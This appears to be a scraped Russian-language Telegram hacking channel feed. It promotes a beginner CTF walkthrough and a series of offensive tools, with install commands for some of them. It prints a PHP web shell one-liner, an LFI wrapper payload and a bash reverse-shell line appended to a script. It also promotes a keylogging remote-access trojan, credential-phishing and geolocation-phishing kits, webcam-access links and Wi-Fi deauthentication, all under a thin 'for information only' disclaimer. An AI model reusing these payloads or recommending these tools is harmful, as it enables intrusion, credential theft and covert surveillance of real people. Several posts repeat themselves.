[PYTHON:TODAY]
☠️ Как стать хакером? ⚡️ Большая практика по хакингу и пентесту для новичков 🔥 Ломаем сайт, раскучиваем LFI уязвимость, RCE и отравление логов на сервере 🌵 PHP и BASH Reverse shell 🕳 Что такое PHP wrapper и как с их помощью проникать на сайт Если интересна…
✍️ Софт и команды из видео
🖥 Большой выбор бесплатных машин
https://tryhackme.com/
🖥 Машина из видео
https://tryhackme.com/room/watcher
🔎 Nmap под разные ОС
https://nmap.org/download.html
🗂 Перебор директорий - dirsearch
https://github.com/maurosoria/dirsearch
☠️ pwncat
https://github.com/calebstewart/pwncat
⌨️ Rustscan
🖥 Большой выбор бесплатных машин
https://tryhackme.com/
🖥 Машина из видео
https://tryhackme.com/room/watcher
🔎 Nmap под разные ОС
https://nmap.org/download.html
🗂 Перебор директорий - dirsearch
https://github.com/maurosoria/dirsearch
☠️ pwncat
https://github.com/calebstewart/pwncat
⌨️ Rustscan
$ rustscan -a ipaddr⌨️ php wrapper
php://filter/convert.base64-encode/resource=index⌨️ php shell
<?php system($_GET['cmd'])?>⌨️ sh reverse shell
echo "/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'" >> backup.sh#pentest #redteam #youtube
👍43❤4
NoSQLMap — инструмент Python с открытым исходным кодом, предназначенный для аудита, а также для автоматизации атак путем внедрения и использования слабых сторон конфигурации по умолчанию в базах данных NoSQL и веб-приложениях, использующих NoSQL, для раскрытия или клонирования данных из базы данных.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #pentest #github #soft #python
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #pentest #github #soft #python
👍45❤9😱4
☠️ Как стать хакером?
⚡️ Большая пошаговая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию
🌵 Энумерация
🌵 SQL инъекции
🌵 Взлом хэшей паролей
🌵 Поиск субдоменов и директорий
🌵 Reverse shell
🌵 Повышение привилегий
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/chC6DWwOiKc
#youtube #pentest #redteam
⚡️ Большая пошаговая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию
🌵 Энумерация
🌵 SQL инъекции
🌵 Взлом хэшей паролей
🌵 Поиск субдоменов и директорий
🌵 Reverse shell
🌵 Повышение привилегий
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/chC6DWwOiKc
#youtube #pentest #redteam
🔥56👍18❤8🤯2
Forwarded from NetStalkers
Шпаргалка по Kali Linux
🔸 SQLMap Examples
🔸 Metasploit
🔸 Exploit Research
🔸 Password Cracking
🔸 Username Enumeration
🔸 HTTP / HTTPS Webserver Enumeration
🔸 DNSRecon
🔸 NMAP Commands и д.р
#redteam #pentest #github
🔸 SQLMap Examples
🔸 Metasploit
🔸 Exploit Research
🔸 Password Cracking
🔸 Username Enumeration
🔸 HTTP / HTTPS Webserver Enumeration
🔸 DNSRecon
🔸 NMAP Commands и д.р
#redteam #pentest #github
👍38🔥5❤1
🔥 Полезные библиотеки Python
CompressedCrack - простой и эффективный скрипт для подбора паролей к zip и rar архивам.
Установка:
Нас интересует скрипт crack.py который принимает несколько параметров:
🌵 min_character: минимальное количество символов в пароле.
🌵 max_character: максимальное количество символов в пароле.
🌵 characters: используемые в пароле символы по которым будет осуществляться перебор, 123qwerty!@$ и т.д.
#python #soft #github #redteam
CompressedCrack - простой и эффективный скрипт для подбора паролей к zip и rar архивам.
Установка:
$ git clone https://github.com/thanhminh6996/CompressedCrack.gitИспользование:
$ cd ./CompressedCrack
Нас интересует скрипт crack.py который принимает несколько параметров:
$ python crack.py -i file_name min_character max_character characters🌵 -i file_name : путь до архива.
🌵 min_character: минимальное количество символов в пароле.
🌵 max_character: максимальное количество символов в пароле.
🌵 characters: используемые в пароле символы по которым будет осуществляться перебор, 123qwerty!@$ и т.д.
$ python crack.py -i file.zip 1 5 1234567890⚙️ GitHub/Инструкция
#python #soft #github #redteam
👍65🔥13❤4🤯1😱1
KIZAGAN — троян для удаленного доступа, написанный на python.
Может снимать снимки с камеры жертвы, записывать звуки микрофона, скриншоты... Также внутри него есть кейлоггер, и по заявлению автора - его невозможно обнаружить.
⚙️ GitHub/Инструкция
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
#python #soft #github #redteam
Может снимать снимки с камеры жертвы, записывать звуки микрофона, скриншоты... Также внутри него есть кейлоггер, и по заявлению автора - его невозможно обнаружить.
⚙️ GitHub/Инструкция
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
#python #soft #github #redteam
👍96🔥12❤9🤯5
🔥 Полезные библиотеки Python
Seeker — интересная утилита позволяющая узнавать геолокацию человека. Делается это с помощью создания фишинговой страницы и последующей генерации ссылки, по которой переходит человек.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
Установка:
Использование:
⚙️ GitHub/Инструкция
#python #github #redteam
Seeker — интересная утилита позволяющая узнавать геолокацию человека. Делается это с помощью создания фишинговой страницы и последующей генерации ссылки, по которой переходит человек.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
Установка:
$ git clone https://github.com/thewhiteh4t/seeker.git
$ cd seeker/
$ chmod +x install.sh
$ ./install.sh
Использование:
$ python3 seeker.py -h
⚙️ GitHub/Инструкция
#python #github #redteam
👍85🔥6🤯2😱1
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 Полезные библиотеки Python
PyPhisher - лучший инструмент для фишинга на Python. Включает в себя популярные веб-сайты, такие как facebook, twitter, instagram, github, reddit, gmail и многие другие.
Скрипт генерирует ссылки для фишинга популярных социальных сетей и как только username входит в систему, учетные данные перехватываются хакером.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
PyPhisher - лучший инструмент для фишинга на Python. Включает в себя популярные веб-сайты, такие как facebook, twitter, instagram, github, reddit, gmail и многие другие.
Скрипт генерирует ссылки для фишинга популярных социальных сетей и как только username входит в систему, учетные данные перехватываются хакером.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
👍77🫡21😱5🔥4🤯3❤2
🔥 Полезные библиотеки Python
💻 Photon — невероятно быстрый сканер, разработанный для OSINT.
Может извлекать следующие данные во время сканирования:
🌵 URL-адреса (входящие и не входящие)
🌵 URL-адреса с параметрами ( example.com/gallery.php?id=2)
🌵 Intel (электронная почта, учетные записи в социальных сетях, корзины Amazon и т. д.)
🌵 Файлы (pdf, png, xml и т. д.)
🌵 Секретные ключи (ключи авторизации/API и хэши)
🌵 Файлы JavaScript и присутствующие в них конечные точки
🌵 Строки, соответствующие пользовательскому шаблону регулярного выражения
🌵 Субдомены и данные, связанные с DNS
💬 Установка:
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
💻 Photon — невероятно быстрый сканер, разработанный для OSINT.
Может извлекать следующие данные во время сканирования:
🌵 URL-адреса (входящие и не входящие)
🌵 URL-адреса с параметрами ( example.com/gallery.php?id=2)
🌵 Intel (электронная почта, учетные записи в социальных сетях, корзины Amazon и т. д.)
🌵 Файлы (pdf, png, xml и т. д.)
🌵 Секретные ключи (ключи авторизации/API и хэши)
🌵 Файлы JavaScript и присутствующие в них конечные точки
🌵 Строки, соответствующие пользовательскому шаблону регулярного выражения
🌵 Субдомены и данные, связанные с DNS
💬 Установка:
$ git clone https://github.com/s0md3v/Photon.git
$ cd Photon
$ pip install requirements.txt
$ python photon.py
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
👍64🔥13❤8🎉1
🔥 Полезные библиотеки Python
ZCam - утилита позволяет получать доступ к чужой веб-камере с помощью Python скрипта, который генерирует специальную ссылку для отправки цели.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
ZCam - утилита позволяет получать доступ к чужой веб-камере с помощью Python скрипта, который генерирует специальную ссылку для отправки цели.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
👍79🔥15🤯12❤5😱5
KickThemOut — скрипт на Python с говорящим названием. Инструмент позволяет выкидывать пользователей из Wi-Fi сети, что бы использовать всю пропускную способность самому, оборвать нежелательные подключения или же повеселиться над пользователями.
Утилита позволяет выбрать и удалить определенные устройства или исключить сразу все ☠️
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub
#pentest #redteam #github #soft #python
Please open Telegram to view this post
VIEW IN TELEGRAM
👍93❤9🤯8🔥3😱2
🔥 Полезные библиотеки Python
🔐 Passhunt — простой, полезный инструмент для поиска паролей от роутеров и веб-приложений.
На данный момент в базе более 2000 дефолтных паролей от разных роутеров.
Установка:
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
#python #github #soft #code #redteam #pentest
🔐 Passhunt — простой, полезный инструмент для поиска паролей от роутеров и веб-приложений.
На данный момент в базе более 2000 дефолтных паролей от разных роутеров.
Установка:
$ git clone https://github.com/Viralmaniar/Passhunt.gitЗапуск:
$ cd Passhunt
$ pip3 install -r requirements.txt
$ python3 Passhunt.py⚙️ GitHub/Инструкция
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
#python #github #soft #code #redteam #pentest
👍56🔥13🤯6❤4🫡1
🌵 Фундаментальные знания, основы
🌵 Сети
🌵 Шифрование
🌵 Веб
🌵 Стеганография
🌵 Эскалация привилегий
🌵 Анализ вредоносного ПО
🌵 Мисконфиги и т.д.
💾 PDF версия
#doc #pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍39🤯30🔥10❤2🫡2
Forwarded from NetStalkers
Хорошая статья по пентесту WordPress на русском.
Сегодня более половины всех сайтов работают на CMS, а согласно данным W3Techs 63,7% из них используют WordPress. Если ваш сайт один из таких, тогда в этой статье вы узнаете о том, как проверить его на прочность с помощью одного из самых мощных инструментов для пентеста Wordpress – WPScan.➡️ Введение➡️ Сканирование версии WordPress➡️ Сканирование установленных тем оформления➡️ Сканирование установленных плагинов➡️ Сканирование пользователей➡️ Сканирование тем, плагинов и пользователей одной командой➡️ Брутфорс с помощью WPScan➡️ Загрузка шелла с помощью Metasploit➡️ Использование уязвимостей в плагинах➡️ Сканирование через прокси-сервер➡️ Сканирование с включенной HTTP-аутентификацией
#doc #pentest #redteam #article
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥31👍20❤3
Повышение привилегий — это использование компьютерного бага, уязвимостей, ошибки в конфигурации операционной системы или программного обеспечения с целью повышения уровня доступа к вычислительным ресурсам, которые обычно защищены от пользователя.
#pentest #redteam #linux #doc
Please open Telegram to view this post
VIEW IN TELEGRAM
👍41🔥6❤4
Жертва получает видео, которое предлагают открыть через сторонний плеер — как только вы соглашаетесь, смартфон начинает загрузку вирусов.
Предупредите близких и не открывайте видео от неизвестных пользователей
#news #pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😱43🤯12🔥8👍6❤3